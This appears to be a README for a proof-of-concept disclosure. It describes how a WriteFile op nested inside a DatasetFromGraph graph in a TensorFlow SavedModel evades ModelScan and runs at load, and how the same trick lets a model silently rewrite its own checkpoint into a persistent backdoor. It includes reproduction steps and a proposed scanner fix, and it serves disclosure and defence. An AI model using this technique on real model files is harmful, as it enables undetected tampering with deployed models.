| # SavedModel scanner bypass via nested `DatasetFromGraph` `WriteFile` | |
| Three SavedModels that demonstrate, in order, that ModelScan does flag | |
| `WriteFile` when it can see it, that nesting it inside `DatasetFromGraph` | |
| makes it invisible to ModelScan while still running at load, and that the | |
| same nesting technique can rewrite the model's own checkpoint and turn | |
| into a persistent backdoor. | |
| **One thing to be clear about up front.** The `top_level_writefile` model | |
| is a control, not a finding. ModelScan flagging it as HIGH is the intended, | |
| healthy behaviour — it proves the scanner does detect `WriteFile` when | |
| it's visible. The actual bypass is `nested_writefile`, and the backdoor | |
| is `self_poisoning_writefile`. Both of those run the same load-time | |
| `WriteFile` and both pass ModelScan with zero issues. | |
| Tested against the latest published versions of TensorFlow and ModelScan | |
| on PyPI (TensorFlow 2.21.0, ModelScan 0.8.8). | |
| ## What's in the box | |
| ``` | |
| build_poc.py                  rebuild all three SavedModels | |
| verify_poc.py                 run ModelScan + load each model + the self-poison | |
|                               first/second-load differential, all in an isolated cwd | |
| requirements.txt              pinned tensorflow and modelscan | |
| sample_results.json           sanitised output from a passing run | |
| models/ | |
|   top_level_writefile/        ordinary WriteFile in the top-level GraphDef | |
|   nested_writefile/           same WriteFile hidden inside a nested GraphDef | |
|   self_poisoning_writefile/   nested WriteFile that overwrites the model's | |
|                               own variables/ checkpoint at load | |
| ``` | |
| ## What each case shows | |
| ### `top_level_writefile` — control (not a finding) | |
| This case exists to prove the baseline. The top-level `GraphDef` | |
| contains the `WriteFile` op directly. ModelScan 0.8.8 reports one HIGH | |
| issue with `operator = WriteFile`, and the model writes its marker file | |
| when loaded. **The control passing is the expected outcome** — it's the | |
| "ModelScan does detect `WriteFile` when it's visible" half of the | |
| differential. Without this case there's no way to say what the bypass | |
| is bypassing. | |
| ### `nested_writefile` — bypass | |
| Same `WriteFile`, same payload, same load-time effect. The only | |
| difference is location. The top-level `GraphDef` contains only | |
| `Const`, `DatasetFromGraph`, and `DatasetToGraphV2`. The `WriteFile` | |
| sits inside a serialised `GraphDef` carried as the bytes of a `Const` | |
| string tensor, and `DatasetFromGraph` consumes that string as a second | |
| parser root. | |
| ModelScan walks the top-level nodes and the function library. It | |
| doesn't parse `Const` string tensors as nested `GraphDef`s, so the | |
| hidden `WriteFile` is invisible to it. The scan reports | |
| `total_issues = 0`. At load time TensorFlow traverses the inner graph | |
| through the TF1 `legacy_init_op` and runs the hidden write anyway. | |
| `saved_model_cli show --all` is also blind to the nested op. | |
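A toy illustration of why a top-level op walk misses the payload. It does not use TensorFlow or ModelScan: graphs are plain dicts, the inner graph is serialised with `json` as a stand-in for protobuf bytes, and `flat_ops` / `recursive_ops` are hypothetical names chosen for this sketch.

```python
import json

# Inner graph: holds the op a denylist would flag.
inner_graph = {"nodes": [{"op": "Const"}, {"op": "WriteFile"}]}

# Top-level graph: the inner graph travels as opaque bytes inside a Const.
top_graph = {
    "nodes": [
        {"op": "Const", "value": json.dumps(inner_graph).encode()},
        {"op": "DatasetFromGraph"},
        {"op": "DatasetToGraphV2"},
    ]
}


def flat_ops(graph):
    """Op names visible to a walk that never decodes Const payloads."""
    return {node["op"] for node in graph["nodes"]}


def recursive_ops(graph, depth=0, max_depth=4):
    """Op names found when Const byte payloads are also tried as graphs."""
    ops = flat_ops(graph)
    if depth >= max_depth:
        return ops
    for node in graph["nodes"]:
        payload = node.get("value")
        if not isinstance(payload, bytes):
            continue
        try:
            inner = json.loads(payload)
        except ValueError:
            continue  # not a serialised graph, ignore it
        if isinstance(inner, dict) and "nodes" in inner:
            ops |= recursive_ops(inner, depth + 1, max_depth)
    return ops


print("WriteFile" in flat_ops(top_graph))       # False
print("WriteFile" in recursive_ops(top_graph))  # True
```

The flat walk sees only `Const`, `DatasetFromGraph`, and `DatasetToGraphV2`, which mirrors what the scan and `saved_model_cli` report for this case.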
| ### `self_poisoning_writefile` — persistent backdoor | |
| A serving model with one variable `w` and signature `y = x * w`. The | |
| model ships with `w = 2.0` on disk. The same nested `DatasetFromGraph` | |
| mechanism carries two hidden `WriteFile` nodes targeting relative paths | |
| `variables/variables.data-00000-of-00001` and `variables/variables.index`. | |
| The contents are checkpoint bytes from a sibling template model built | |
| with `w = 1337.0`. | |
| At first load: | |
| 1. TF restores `w = 2.0` from disk into memory. | |
| 2. The `legacy_init_op` runs the hidden writes, which overwrite the | |
| on-disk checkpoint with the `w = 1337.0` bytes. | |
| 3. Inference still uses the in-memory `w = 2.0`, so `y(3.0) = 6.0`. | |
| The model behaves correctly on this first load, which means a deployment | |
| pipeline that smoke-tests a model once and promotes it on success would | |
| see no anomaly. | |
| On every load after that: | |
| 1. TF restores `w = 1337.0` from the now-poisoned checkpoint. | |
| 2. Inference returns `y(3.0) = 4011.0`. | |
| ModelScan reports the model clean for this case too. | |
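The first-load / later-load sequence above can be mimicked without TensorFlow. This is only a simulation of the ordering (restore, then write, then serve): the text file `w.txt` and the function `load_and_infer` are hypothetical stand-ins, not the real checkpoint format or loader.

```python
import tempfile
from pathlib import Path


def load_and_infer(model_dir: Path, x: float, poison: float = 1337.0) -> float:
    """Toy load: restore w, run a load-time write, then serve y = x * w."""
    ckpt = model_dir / "variables" / "w.txt"  # stand-in for the checkpoint
    w = float(ckpt.read_text())               # 1. restore weights into memory
    ckpt.write_text(str(poison))              # 2. load-time write poisons the disk copy
    return x * w                              # 3. inference uses the in-memory value


with tempfile.TemporaryDirectory() as tmp:
    model_dir = Path(tmp)
    (model_dir / "variables").mkdir()
    (model_dir / "variables" / "w.txt").write_text("2.0")

    first = load_and_infer(model_dir, 3.0)
    second = load_and_infer(model_dir, 3.0)

print(first, second)  # 6.0 4011.0
```

Because the write happens after the restore, the process that performs the poisoning never observes the poisoned weight.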
| ## Requirements | |
| The pinned versions match the latest stable releases on PyPI at the time | |
| of writing. | |
| ``` | |
| python >= 3.10 | |
| tensorflow == 2.21.0 # latest on PyPI | |
| modelscan == 0.8.8 # latest on PyPI | |
| ``` | |
| Install: | |
| ``` | |
| pip install -r requirements.txt | |
| ``` | |
| ## Reproducing the differential | |
| The repo ships with the prebuilt models under `models/`. To verify all | |
| three cases: | |
| ``` | |
| python verify_poc.py | |
| ``` | |
| The verifier picks a fresh temp directory, runs ModelScan and | |
| `saved_model_cli show --all` on each model, then loads each model in a | |
| child Python process. For the marker cases the child cwd is set to the | |
| per-case workdir so the relative marker path resolves there. For the | |
| self-poisoning case, the model is copied into the workdir, the child cwd | |
| is set to the copied model directory, and the model is loaded twice with | |
| its `variables/` hashes captured before, after the first load, and after | |
| the second load. | |
| Expected output: | |
| ```json | |
| { | |
| "top_level_writefile": { | |
| "pass": true, | |
| "intent": "control: ModelScan is expected to detect top-level WriteFile", | |
| "top_level_has_writefile": true, | |
| "modelscan_total_issues": 1, | |
| "modelscan_flagged_writefile": true, | |
| "marker_written": true | |
| }, | |
| "nested_writefile": { | |
| "pass": true, | |
| "intent": "bypass: ModelScan is expected to miss nested WriteFile, load is expected to run it anyway", | |
| "top_level_has_writefile": false, | |
| "nested_has_writefile": true, | |
| "modelscan_total_issues": 0, | |
| "modelscan_issues_empty": true, | |
| "marker_written": true | |
| }, | |
| "self_poisoning_writefile": { | |
| "pass": true, | |
| "intent": "persistent backdoor: first load returns benign output, on-disk checkpoint is rewritten, second load returns attacker-chosen output", | |
| "top_level_has_writefile": false, | |
| "nested_has_writefile": true, | |
| "modelscan_total_issues": 0, | |
| "modelscan_issues_empty": true, | |
| "input": 3.0, | |
| "expected_benign_output": 6.0, | |
| "expected_poison_output": 4011.0, | |
| "first_load_output": 6.0, | |
| "second_load_output": 4011.0, | |
| "first_load_matches_benign": true, | |
| "second_load_matches_poison": true, | |
| "checkpoint_changed_after_first_load": true, | |
| "checkpoint_stable_after_second_load": true | |
| } | |
| } | |
| ``` | |
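A small sketch for checking a results file mechanically instead of by eye. It assumes the results have the top-level shape shown above (one object per case, each with a `pass` flag); `failing_cases` is a hypothetical helper, not part of `verify_poc.py`, and the inline sample is trimmed to two fields per case.

```python
import json


def failing_cases(results):
    """Names of cases whose "pass" flag is missing or not true."""
    return sorted(
        name for name, case in results.items() if case.get("pass") is not True
    )


sample = json.loads("""
{
  "top_level_writefile": {"pass": true, "modelscan_total_issues": 1},
  "nested_writefile": {"pass": true, "modelscan_total_issues": 0},
  "self_poisoning_writefile": {"pass": true, "modelscan_total_issues": 0}
}
""")

print(failing_cases(sample))  # []
```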
| If you want to rebuild the models yourself before verifying: | |
| ``` | |
| python build_poc.py --overwrite | |
| python verify_poc.py | |
| ``` | |
| If you want the loader to use a directory you choose instead of a temp | |
| directory: | |
| ``` | |
| python verify_poc.py --workdir ./scratch | |
| ``` | |
| After a run the marker cases leave files at: | |
| ``` | |
| ./scratch/top_level_writefile/tfhunt_markers/top_level_writefile.txt | |
| ./scratch/nested_writefile/tfhunt_markers/nested_writefile.txt | |
| ``` | |
| Both contain `tfhunt_writefile_payload\n`. | |
| The self-poisoning case leaves a copy of the model with the poisoned | |
| checkpoint at: | |
| ``` | |
| ./scratch/self_poisoning_writefile/self_poisoning_writefile/ | |
| ``` | |
| Reload that copy directly with `tf.saved_model.load` and you'll see | |
| `y(3.0) = 4011.0` instead of the original `6.0`. | |
| ## Manual verification | |
| If you don't want to trust `verify_poc.py`, each claim below can be | |
| checked with the stock tooling. Steps 1 to 3 start and end at the repo | |
| root. Step 4 starts at the repo root and leaves you in `manual_poison/`, | |
| which is where step 5 runs. | |
| ### 1. ModelScan flags the control, misses the bypass | |
| ``` | |
| modelscan scan -p ./models/top_level_writefile | |
| modelscan scan -p ./models/nested_writefile | |
| ``` | |
| The first scan reports one HIGH issue with `operator = WriteFile`, | |
| which is the control behaving correctly. The second scan reports | |
| `total_issues = 0` on a model that performs the same load-time write. | |
| ### 2. `saved_model_cli` is blind to the nested op | |
| ``` | |
| python -m tensorflow.python.tools.saved_model_cli show --dir ./models/nested_writefile --all | |
| ``` | |
| The relevant line in the output is: | |
| ``` | |
| The MetaGraph with tag set ['serve'] contains the following ops: {'Const', 'DatasetToGraphV2', 'DatasetFromGraph'} | |
| ``` | |
| No mention of `WriteFile`. | |
| ### 3. `tf.saved_model.load` runs the hidden write | |
| The marker path baked into the model is relative, so the write lands | |
| wherever the loader's cwd is. Run the load in a clean working directory. | |
| Linux / macOS: | |
| ``` | |
| mkdir manual_load && cd manual_load | |
| python -c "import tensorflow as tf; tf.saved_model.load('../models/nested_writefile')" | |
| ls tfhunt_markers | |
| cat tfhunt_markers/nested_writefile.txt | |
| cd .. | |
| ``` | |
| Windows PowerShell: | |
| ``` | |
| New-Item -ItemType Directory manual_load | Out-Null; Set-Location manual_load | |
| python -c "import tensorflow as tf; tf.saved_model.load('../models/nested_writefile')" | |
| Get-ChildItem tfhunt_markers | |
| Get-Content tfhunt_markers\nested_writefile.txt | |
| Set-Location .. | |
| ``` | |
| Expected file content: | |
| ``` | |
| tfhunt_writefile_payload | |
| ``` | |
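The cwd dependence can be seen in isolation with a child process. This is a sketch of the general technique (run the load in a child whose `cwd` is a scratch directory), not the code in `verify_poc.py`; the child here only writes a relative marker file as a stand-in for the model load, and `run_in_cwd` and `demo.txt` are hypothetical names.

```python
import subprocess
import sys
import tempfile
from pathlib import Path

# Stand-in for the model load: a child that writes to a relative path.
CHILD_CODE = (
    "from pathlib import Path;"
    "Path('tfhunt_markers').mkdir(exist_ok=True);"
    "Path('tfhunt_markers/demo.txt').write_text('tfhunt_writefile_payload\\n')"
)


def run_in_cwd(workdir):
    """Run the child with cwd=workdir and return the marker path it creates."""
    subprocess.run([sys.executable, "-c", CHILD_CODE], cwd=workdir, check=True)
    return Path(workdir) / "tfhunt_markers" / "demo.txt"


with tempfile.TemporaryDirectory() as tmp:
    marker = run_in_cwd(tmp)
    content = marker.read_text()

print(repr(content))  # 'tfhunt_writefile_payload\n'
```

Setting `cwd` on the child keeps the relative write inside the scratch directory regardless of where the parent process was started.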
| ### 4. Self-poisoning rewrites the checkpoint on first load | |
| The relative `WriteFile` targets are `variables/...`, so the load must | |
| run with cwd set to a copy of the model directory. The copy step is | |
| important — without it, the bundled model itself would get poisoned. | |
| Linux / macOS: | |
| ``` | |
| cp -r models/self_poisoning_writefile manual_poison | |
| cd manual_poison | |
| sha256sum variables/variables.data-00000-of-00001 | |
| python -c "import tensorflow as tf; tf.saved_model.load('.')" | |
| sha256sum variables/variables.data-00000-of-00001 | |
| ``` | |
| Windows PowerShell: | |
| ``` | |
| Copy-Item -Recurse models/self_poisoning_writefile manual_poison | |
| Set-Location manual_poison | |
| Get-FileHash variables/variables.data-00000-of-00001 -Algorithm SHA256 | |
| python -c "import tensorflow as tf; tf.saved_model.load('.')" | |
| Get-FileHash variables/variables.data-00000-of-00001 -Algorithm SHA256 | |
| ``` | |
| The two hashes will differ. The on-disk checkpoint has been physically | |
| overwritten by the load. | |
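For a check that works the same on every platform and covers both checkpoint files at once, the directory can be hashed from Python. A minimal sketch using only the standard library; `snapshot` and `changed_files` are hypothetical helper names, and the demo writes placeholder bytes rather than a real checkpoint.

```python
import hashlib
import tempfile
from pathlib import Path


def snapshot(directory):
    """Map each file's relative POSIX path to its SHA-256 hex digest."""
    root = Path(directory)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def changed_files(before, after):
    """Relative paths whose digest differs, appeared, or disappeared."""
    keys = before.keys() | after.keys()
    return sorted(k for k in keys if before.get(k) != after.get(k))


with tempfile.TemporaryDirectory() as tmp:
    target = Path(tmp) / "variables.index"
    target.write_bytes(b"placeholder for w=2.0")
    before = snapshot(tmp)
    target.write_bytes(b"placeholder for w=1337.0")
    after = snapshot(tmp)

print(changed_files(before, after))  # ['variables.index']
```

In the manual flow, call `snapshot("variables")` once before the load and once after it, then compare the two results.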
| ### 5. Second load returns the attacker's weights | |
| Stay in the `manual_poison/` directory from step 4 and run the load | |
| again, this time invoking the serving signature: | |
| ``` | |
| python -c "import tensorflow as tf; loaded = tf.saved_model.load('.'); out = loaded.signatures['serving_default'](x=tf.constant(3.0)); print(float(next(iter(out.values())).numpy()))" | |
| ``` | |
| Expected output: | |
| ``` | |
| 4011.0 | |
| ``` | |
| The shipped model is `y = x * w` with `w = 2.0`, so a clean `y(3.0)` | |
| would be `6.0`. After the load-time write in step 4 rewrote the | |
| checkpoint to `w = 1337.0`, the second load reads the poisoned weights | |
| and returns `4011.0`. Return to the repo root with `cd ..` when done. | |
| ### Troubleshooting | |
| - `ModuleNotFoundError: No module named 'tensorflow'` — TensorFlow | |
| isn't installed in the active environment. Run | |
| `pip install -r requirements.txt` from the repo root. | |
| - `pip install` resolution fails on `modelscan` — it needs | |
| Python 3.10-3.12. If the extras aren't pulled in, install with | |
| `pip install 'modelscan[tensorflow,h5py]==0.8.8'`. | |
| - Step 3's marker file doesn't appear — the cwd isn't where you think | |
| it is. Add `import os; print(os.getcwd())` before the `tf.saved_model.load` | |
| call to confirm. | |
| - Step 5 still returns `6.0` — the cwd in step 4 wasn't the copied | |
| `manual_poison` directory, so nothing was poisoned. Copy the model | |
| again from the bundle (`models/self_poisoning_writefile`) and rerun | |
| step 4 with the new copy. Or just rebuild everything from scratch | |
| with `python build_poc.py --overwrite`. | |
| - `saved_model_cli: command not found` — it ships with TensorFlow but | |
| isn't always on `PATH`. Use the explicit form | |
| `python -m tensorflow.python.tools.saved_model_cli show ...`. | |
| ## Why this is interesting | |
| ModelScan flags `WriteFile` as HIGH when it sees it in the top-level | |
| graph, so the operator is already on the unsafe list. The bypass isn't | |
| about the operator. It's about where it's allowed to hide. | |
| The same idea generalises to any side-effecting op that TensorFlow will | |
| run from inside an inner dataset graph. `WriteFile` is the cleanest | |
| demonstration because it's already on ModelScan's denylist, which makes | |
| the top-level-vs-nested differential unambiguous. | |
| The self-poisoning case turns that file-write primitive into a | |
| persistent output-manipulation backdoor that's hard to catch with a | |
| single-load smoke test, because the malicious output only appears on the | |
| second and later loads. | |
| The hidden write also runs in `tf.lite.TFLiteConverter.from_saved_model`, | |
| `tf2onnx.convert`, TensorFlow Serving, and the NVIDIA Triton TensorFlow | |
| backend. Those tests live outside this PoC bundle to keep it small and | |
| auditable, but they use models built the same way. | |
| ## Safety | |
| At load time these models do exactly two things beyond ordinary graph loading: | |
| - `top_level_writefile` and `nested_writefile` write | |
| `tfhunt_writefile_payload\n` to a relative path | |
| `tfhunt_markers/<name>.txt`, resolved against the loader's working | |
| directory. | |
| - `self_poisoning_writefile` overwrites two relative paths | |
| `variables/variables.data-00000-of-00001` and `variables/variables.index` | |
| with the byte content of a `w = 1337.0` template checkpoint. Because | |
| the verifier sets cwd to the copied model directory, those writes only | |
| touch the copy, not the bundled artifact. | |
| None of the models reach for absolute paths, environment variables, | |
| network, credentials, or any other resource. | |
| If you want to inspect the nested graphs yourself without loading the | |
| models, `verify_poc.py`'s `inspect_saved_model` function parses the | |
| serialised inner `GraphDef`s and lists their nodes. | |
| ## Suggested fix | |
| The gap in `modelscan.scanners.SavedModelTensorflowOpScan` is that it | |
| walks `GraphDef.node` and the function library on the top-level | |
| `MetaGraphDef` but doesn't recurse into ops whose inputs are serialised | |
| `GraphDef` bytes. The fix is to treat those ops as parser roots. | |
| Sketch of what the scan loop could look like: | |
| ```python | |
| from tensorflow.core.framework.graph_pb2 import GraphDef | |
|  | |
| # UNSAFE_OPERATORS, report_issue and resolve_const_string_input are | |
| # placeholders for the scanner's own denylist and helpers. | |
| NESTED_GRAPHDEF_OPS = { | |
|     "DatasetFromGraph",  # ops that accept a serialised GraphDef in a string input | |
|     "XlaCallModule",     # carries a serialised StableHLO / MLIR module, | |
|                          # which would need its own parser rather than GraphDef | |
| } | |
| MAX_RECURSION_DEPTH = 4 | |
| MAX_INNER_BYTES = 10 * 1024 * 1024 | |
|  | |
| def scan_graphdef(graph_def, depth=0): | |
|     # Stop descending once the nesting is deeper than the cap. | |
|     if depth > MAX_RECURSION_DEPTH: | |
|         return | |
|     for node in graph_def.node: | |
|         if node.op in UNSAFE_OPERATORS: | |
|             report_issue(node, depth=depth) | |
|         if node.op in NESTED_GRAPHDEF_OPS: | |
|             inner_bytes = resolve_const_string_input(node, "graph_def", graph_def) | |
|             # Skip inputs that are not a resolvable Const or exceed the byte cap. | |
|             if inner_bytes is None or len(inner_bytes) > MAX_INNER_BYTES: | |
|                 continue | |
|             inner = GraphDef() | |
|             inner.ParseFromString(inner_bytes) | |
|             scan_graphdef(inner, depth=depth + 1) | |
|     for fn in graph_def.library.function: | |
|         for node in fn.node_def: | |
|             # Same walk as above, on the function library. | |
|             ... | |
| ``` | |
| The bounded recursion depth and byte cap stop a malicious model from | |
| turning a recursive scan into a parser DoS. | |
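One way the `resolve_const_string_input` helper used in the sketch could look. It is a hypothetical helper, not an existing ModelScan function. It assumes the named input is the op's first positional input and that it is fed directly by a `Const` node; a payload routed through other ops would need more work. The function only touches the `NodeDef` fields `name`, `op`, `input` and `attr["value"].tensor.string_val`, so the demo uses duck-typed stand-ins instead of real protobuf objects.

```python
from types import SimpleNamespace


def resolve_const_string_input(node, input_name, graph_def):
    """Return the bytes of the Const string tensor feeding `node`, or None.

    Assumption: `input_name` refers to the op's first positional input.
    A real scanner would map input names to positions through the OpDef.
    """
    if not node.input:
        return None
    # NodeDef inputs look like "producer", "producer:0" or "^control_dep".
    ref = node.input[0]
    if ref.startswith("^"):
        return None
    producer_name = ref.split(":")[0]
    for candidate in graph_def.node:
        if candidate.name == producer_name and candidate.op == "Const":
            values = candidate.attr["value"].tensor.string_val
            return bytes(values[0]) if values else None
    return None  # fed by something other than a direct Const


# Duck-typed stand-ins so the sketch runs without TensorFlow installed.
const = SimpleNamespace(
    name="inner",
    op="Const",
    input=[],
    attr={"value": SimpleNamespace(tensor=SimpleNamespace(string_val=[b"\x0a\x00"]))},
)
consumer = SimpleNamespace(name="ds", op="DatasetFromGraph", input=["inner:0"], attr={})
graph = SimpleNamespace(node=[const, consumer])

print(resolve_const_string_input(consumer, "graph_def", graph))  # b'\n\x00'
```

Returning `None` for anything that is not a direct `Const` keeps the scanner conservative: it skips what it cannot resolve, so a production version would probably want to report unresolved inputs rather than ignore them.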
| The same logic would help any scanner that gates `.pb` files on a | |
| top-level op walk. For TensorFlow itself, documenting that any op | |
| carrying serialised IR (`DatasetFromGraph`, `XlaCallModule`, and so on) | |
| should be treated as a parser root by external scanners would help | |
| downstream tooling write fixes that cover all of them at once. | |
| ## Files generated by a run | |
| `verify_poc.py` writes: | |
| - `verification.json` next to the script. This contains absolute paths | |
| from your machine, so it's `.gitignore`d and is not part of the | |
| shipped artifact. | |
| `build_poc.py` writes: | |
| - `models/top_level_writefile/saved_model.pb` | |
| - `models/nested_writefile/saved_model.pb` | |
| - `models/self_poisoning_writefile/saved_model.pb` | |
| - `models/self_poisoning_writefile/variables/variables.data-00000-of-00001` | |
| - `models/self_poisoning_writefile/variables/variables.index` | |
| The first two models have empty `variables/` directories. That's expected for those graphs. | |
| ## Environment used to validate | |
| ``` | |
| Python 3.12.3 | |
| tensorflow 2.21.0 | |
| modelscan 0.8.8 | |
| Windows host | |
| ``` | |